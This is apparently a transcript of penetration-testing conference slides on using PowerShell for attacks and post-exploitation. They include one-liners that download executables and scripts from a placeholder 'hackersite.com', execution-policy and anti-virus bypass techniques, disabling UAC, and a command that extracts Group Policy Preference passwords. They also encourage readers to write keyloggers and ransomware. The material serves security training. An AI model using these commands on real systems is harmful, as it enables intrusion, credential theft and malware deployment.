power on, powershell
DESCRIPTION
TRANSCRIPT
Power on, PowerShell Using PowerShell to do the nasty
Nikhil Sreekumar [email protected]
@roo7break www.roo7break.co.uk
The plug
• Nikhil Sreekumar – Senior Penetration Tester @ 7Safe
– Over three years as penetration tester • CREST ACE certified
– Also deliver’s 7Safe’s courses • CSTP – Certified Security Testing Professional
• CAST – Certified Application Security Tester (advanced)
– Previous roles • Breach Forensic Investigator
• IT Consultant
– Loves Python; Mixed feelings for Ruby; Hates Perl
Intro
• Normal penetration testing revolves a lot around network based attacks using – Attack frameworks (toolkits)
• Social engineering toolkit • Metasploit • Core Impact
– Exploit sources • Exploit-db.com • 1337day.com
• Exploit -> Get a shell -> Exploit more -> Get domain admin -> Report -> Go out for a beer
But, what if
• You have access to a system, but
– No outbound connection*
– You are in a restricted environment (e.g. Citrix)
– Current user privileges are very restricted
– Payloads/tools detected by Anti-Virus/HIDS
* Open traffic is blocked
Time for a rethink
• Cannot rely on any open source exploitation framework
– AV vendors are WATCHING!
– System/Network admins are getting smarter and cleverer
– Organisations are investing in security
• Maybe its time to think of an alternate solution.
– Why not look into bending existing technology to do our bidding?
Welcome to, PowerShell
• Unix bash like shell in Windows – Way powerful than CMD
• Available from Vista upwards – Can be disabled from Server 2008; however its not
that easy in Windows 7
• Allows to – Manage registry, services, processes, event logs
and Windows Management Instrumentation (WMI) – Task based scripting language – Powerful object manipulation capabilities – Simplified and consistent design
• Full integration with – Existing Microsoft products like Exchange, AD, etc. – Can be directly called from .NET framework
[Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx
Show me the money
Scripting PowerShell
• Use of CmdLets
– Lightweight command; used in PowerShell environment.
– Typically a .NET framework class
– Invoked within the context of automation scripts provided at the command line.
– Also invoked programmatically through Windows PowerShell APIs.
Scripting PowerShell
• Basic CmdLets
CmdLets PowerShell Alias CMD.exe *nix environment
Get-Help man, help help man
Get-Content cat, gc, type type cat
Move-Item move, mv, mi move mv
Copy-Item cp, copy, cpi copy cp
Select-String NONE find, findstr grep
Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
Scripting PowerShell
• Basic CmdLets (contd.) – Where-Object (alias ?)
• Filter objects passed down via pipe (|)
Get-Service | ? $_.Status –eq “Running”
Get-Process | ? $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*"
– ForEach-Object (alias %)
• Not to be confused with loop statement, ForEach • Action to be performed on each object passed down via pipe (|)
Get-ChildItem | ForEach-Object echo $_.Name
Same as dir :D
– Get-Member (alias gm)
• Provides you the list of all objects you can access to filter your query using ? And %
Get-ChildItem | gm
• For more info, refer: – http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/ – http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx
How to script using PowerShell
• Using the PowerShell shell
– RUN powershell.exe to start
• Echo commands into a file; Save as .ps1
– .ps1 files are automatically recognised as PowerShell scripts
– Can be manipulated using the built-in PowerShell Integrated Scripting Environment (ISE) – IDE for PowerShell
Sample uses for PT
• Port Scanning 1..1024 | ForEach-Object
echo
((new-object Net.Sockets.TcpClient)
.Connect(“<TargetIP>",$_)) “Port $_ is
open"
2>$null
Port 80 is open
• You could modify the script above to send a string to remote host) for Egress checking
• Port Sweep
– Scan the range for all IPs with port 8080 open 1..255 | ForEach-Object
echo
((New-Object Net.Sockets.TcpClient)
.Connect("10.1.1.$_",8080)) "10.1.1.$_:8080
is open"
2>$null
10.1.1.100:8080 is open
Sample uses for PT
Sample uses for PT
• Downloading stuff
– Binaries (New-Object
System.Net.WebClient).DownloadFile("http://h
ackersite.com/pwnc.exe","c:\pwnc.exe“)
– Text file stdout to local file (New-Object
System.Net.WebClient).DownloadString("http:/
/hackersite.com/malicious.ps1") | Out-File –
Encoding ASCII securescript.ps1
Hold on tiger
• Did you really think its going to be that easy??
– PowerShell isn’t going to let you run any script without having a say.
• It tries to enforce “security” using something called Execution Policy.
– Get-Execution Policy
• Will give you current policy status
The Security
• Execution Policies: – Restricted
• Default policy • Only individual commands; no scripts
– AllSigned • Allows scripts execution • Needs to be signed by trusted publisher • Prompts if ran using untrusted publishers
– RemoteSigned • Allows scripts execution • Scripts downloaded from Internet should be signed by trusted
publisher • Signing not required for local scripts
The Security (contd.)
– Unrestricted • Allows unsigned script execution
• Prompts warning before execution
– Bypass • Nothing is blocked; no warnings or prompts
• To be used when PowerShell is used within a larger app
– Undefined • No specific policy is set to current scope
– If nothing is specified, default policy is applied = Restricted.
• For more information, RTFM
However
Before we move on
• UAC (User Account Control)
– Is a pain in the a**
• Most of the attacks described may/may not interfere with UAC.
• At this point in time, we cannot bypass UAC. Or can we?
– Will take this up at a later stage.
To check UAC level $(Get-ItemProperty -Path
registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\p
olicies\system -Name EnableLUA).EnableLUA
If value is “1”, then UAC is ON.
• To disable UAC Set-ItemProperty -Path
HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system -Name
EnableLUA –Value
However, we need local admin rights
And, a system reboot for this to change to take effect
Think like a hacker
• These policies can be bypassed
• Technique #1
Change the default policy to RemoteSigned
Set-ExecutionPolicy RemoteSigned
–Scope CurrentUser
– However we need admin privileges to do this
– You don’t want to ‘accidently’ set the policy for all users
Think like a hacker
• Technique #2
Pass the command
powershell –command dir
• Executes the specified commands (and any parameters) as though they were typed at the PowerShell command prompt
[Powershell Help]
Think like a hacker
• Technique #2 (contd.) Pass the command powershell –command “New-Object System.Net.WebClient).DownloadFile("http://hackersite.com/pwnc.exe","c:\pwnc.exe“)”
powershell –command “Invoke-Expression (gc .\script.ps1)”
• Need a one liner?
gc .\script.ps1 | iex
Think like a hacker
• Technique #3 CreateCMD • Run a script without actually running a script
– execute the script contents in the current shell context with all new functions that are in the script
• Uses “-EncodedCommand” – Accepts Base64 version of the command
• Checkout Dave Kennedy (ReL1K) and Josh Kelly (winfang) Defcon 18 talk – PowerShell.. OMFG
• Impact – Policy does not matter – No need to disable execution policies – No registry interaction, no reboots, etc.
Think like a hacker
• Technique #3 (contd.) – Write your script (.ps1) in one long line.
– All s should be on the same line and use ; to terminate each command.
$command = Get-Content .\script.ps1
$encodedcmd =
[convert]::ToBase64String([Text.Encod
ing]::Unicode.GetBytes($command))
Powershell.exe –EncodedCommand
$encodedcmd
Think like a hacker
• Technique #4 • This technique will
– try and bypass the execution policy – execute the script in the background
• Can be used once you have a way into a system – E.g. shell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File <script_name>
Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences
• Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO) [http://technet.microsoft.com/en-
us/library/cc731892%28WS.10%29.aspx]
• Helps setting local admin password for workstations and servers – Adding new users on local machines, etc.
– Via Local User and Groups Extension
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences (contd.)
• Unknown to the general public (and many system admins) Windows was storing the encrypted admin passwords in an XML files accessible to normal users
• Location: – \\server\\sysvol\domain\Policies\Hash\MACHINE\Preferences\Grou
ps\Group.xml
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences (contd.)
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences (contd.)
• Encryption – AES = Strong
• It would take years to decrypt that password. Only if someone could help me..
• Why not ask Microsoft?
http://msdn.microsoft.com/en-us/library/cc422924.aspx
Post Exploitation the PowerShell way
• Lets use PowerShell to extract these passwords
– Connect to domain controller as normal user
$output = get-childitem
\\server\\sysvol\domain\Policies\ -
filter *.xml -recurse | Get-
Content;[regex]::match($output,'cpassw
ord="(?<pwd>.+?)"') | foreach
$_.groups["pwd"].value
Post Exploitation the PowerShell way
• Are there any more locations?
• Oh yeah! – Services\Services.xml
– ScheduledTasks\ScheduledTasks.xml
– Printers\Printers.xml
– Drives\Drives.xml
– DataSources\DataSources.xml
• Source: http://rewtdance.blogspot.co.uk/2012/06/exploiting-windows-2008-group-policy.html
Post Exploitation the PowerShell way
Would you like some exploitation with that, Sir?
• Default tools/exploits/payloads are detectable – Customize them
– Design your own exploits
– Innovative encoding/encryption techniques
– Use PowerShell to execute it for you
• Examples – Hyperion runtime encrypter by Nullsecurity.net
• Produces an AES encrypted executable that brute forces its own key in-memory
• Can bypass most anti-virus solutions
• http://nullsecurity.net/papers.html
– Alphanum + ASCII encode + Base64 your executable (use metasploit to do this – msfvenom)
• Then use PowerShell to decode it in-memory and execute it
– Check out www.exploit-monday.com by Matthew Graeber for sample codes
– Also check out the PowerShell code used in SET - http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/
• Can bypass most anti-virus solutions
• http://www.offensive-security.com/metasploit-unleashed/Msfvenom
• Homework • Try out PowerShell based attacks using Social Engineering
Toolkit (SET) • Recode Metasploit modules to be used within PowerShell
scripts • Come up with innovative attacks using PowerShell.
– Webcam, microphone, keyloggers, etc.
• Naughty, naughty. • How about designing your own ransomware
– Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not accept any responsibility for your actions. Your actions, your responsibility. I have warned you.
– http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
More??
Powered by PowerShell
• Existing PowerShell based attack tools – Metasploit PowerShell modules
– PowerSploit
– Nishang
– PowerSyringe
• Recommended Reads and References – PowerShell for Pentesters
• http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
– PowerShell OMFG
• https://www.trustedsec.com/august-2010/powershell_omfg/
– PowerShell Code Repository
• http://poshcode.org/
– Windows PowerShell Cookbook
• By Lee Holmes
– Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned
• By Chris Gates (carnal0wnage)
• http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences
And to conclude
• Sys admins/Network admins/Managers – Check out every new feature introduced by a vendor – Is it necessary for your org? No? Remove/Disable it. – Ensure AV is installed and updated on production environment. – Attend more security conferences to find out what new tech the
hackers could use to attack your organisation.
• Hacker/Pentesters – Check out every new feature introduced by a vendor – Look at how you can twist various features to do your bidding – Don’t rely on your attacks tools – Remember AV vendors are watching and catching up – Push yourself – come up with innovative tech – Communicate all new tech u find. Our community is very open. You
could end up finding an even better way to attack.
• Twitter: @roo7break • Web: www.roo7break.co.uk • Email: [email protected]